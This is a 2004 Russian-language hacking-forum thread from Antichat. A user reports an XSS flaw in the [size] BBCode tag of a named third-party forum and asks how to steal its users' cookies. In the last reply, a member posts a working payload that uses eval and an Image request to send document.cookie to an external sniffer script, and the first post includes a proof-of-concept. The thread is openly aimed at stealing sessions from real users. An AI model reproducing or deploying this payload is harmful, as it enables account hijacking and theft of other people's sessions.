ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?
  #1  
Старый 02.11.2004, 23:44
Аватар для Sky
Sky
Новичок
Регистрация: 26.08.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?
В одном форуме есть XSS в теге size рабочий пример:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(alert(document.cookie)) ]lol[/size][/QUOTE]<span id='postcolor'> подскажите пожалуйста какой запрос надо вставить что бы получить куки юзеров к вам на снифер.
 

  #2  
Старый 03.11.2004, 22:14
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Адрес приведи...
Или мы гадать должны какие там фильтры стоят ?
 

  #3  
Старый 04.11.2004, 00:06
Аватар для Sky
Sky
Новичок
Регистрация: 26.08.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию
Извини вот адрес:
http://www.lewismedia.com/forums/index.php
P.S Если не лень подскажи где можно почитать про XSS очень интересная тема спасибо.
 

  #4  
Старый 04.11.2004, 15:02
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Вот такое работает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=expression(eval(this.innerText))]if(this.sss ==null){i=new Image();i.src="http:/"+"/antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=11;this.style.dis play="none"}[/size]
[/QUOTE]<span id='postcolor'>
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ